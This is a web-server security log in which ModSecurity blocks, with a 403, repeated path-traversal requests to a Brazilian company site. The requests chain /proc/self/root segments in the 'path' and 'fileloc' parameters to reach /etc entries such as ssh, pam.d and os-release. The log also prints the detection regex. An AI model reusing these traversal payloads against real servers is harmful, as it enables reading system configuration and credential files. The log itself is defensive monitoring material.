[Fri Mar 20 04:02:43.644863 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:43904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxEjJ3M9BSuKP7CAbjigAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:45.302639 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:43914] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxFfXLqtnMIWvjpaJsOQAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:46.674960 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.241.31:43922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxFl1pVZ5mVmJwsFMEMQAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:57.167698 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:56306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxIda6ubjKNq_cu4ah9wAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:02:58.523090 2026] [:error] [pid 11642:tid 140411649607424] [client 74.7.241.31:44558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxIrninkcc-iUj5AowvQAAA4s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:06.432583 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:44568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxKvXLqtnMIWvjpaJsSwAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:11.628063 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:44568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxL_XLqtnMIWvjpaJsUAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:12.937988 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:40608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxMF1pVZ5mVmJwsFMERwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:15.293891 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:40618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxM-oXxyEfFpUF8f9WvgAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:16.638744 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:40632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxNOoXxyEfFpUF8f9WwwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:17.999040 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.241.31:54740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxNV1pVZ5mVmJwsFMEUQAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:19.310198 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:54744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxN_qxLDW4GITHUkS08QAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:20.601305 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:54748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxOBCii7xarUs8iHY3qwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:21.747145 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.241.31:54754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxOQF0L0L-SsrnPo47NwAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:23.128564 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:54764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxOxCii7xarUs8iHY3sQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:25.550897 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.241.31:54774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxPbninkcc-iUj5AowzgAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:28.047048 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:54788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxQPqxLDW4GITHUkS0_AAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:30.444846 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:39382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxQvqxLDW4GITHUkS1AAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:32.800110 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:39398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxRAF0L0L-SsrnPo47PQAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:36.143285 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:39408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxSPXLqtnMIWvjpaJsXwAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:03:40.338231 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.241.31:42242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzxTPqxLDW4GITHUkS1DgAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
